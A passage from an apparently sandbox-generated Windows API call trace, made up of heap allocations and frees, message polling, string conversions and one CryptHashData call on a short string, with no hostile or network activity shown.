hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0242.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0242.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0242.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0242.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0242.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0242.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0242.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.713] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.713] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.714] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0242.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54ec8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0242.714] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0242.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0242.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0242.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04380 [0242.715] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.716] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0242.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50ff8 [0242.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ff8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0242.716] CryptHashData (hHash=0xa87610, pbData=0x2e54e08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978528 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0242.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0242.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0242.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0242.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0242.719] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.720] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0242.720] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0242.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0242.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0242.720] HeapFree (in: hHeap=0x970000, 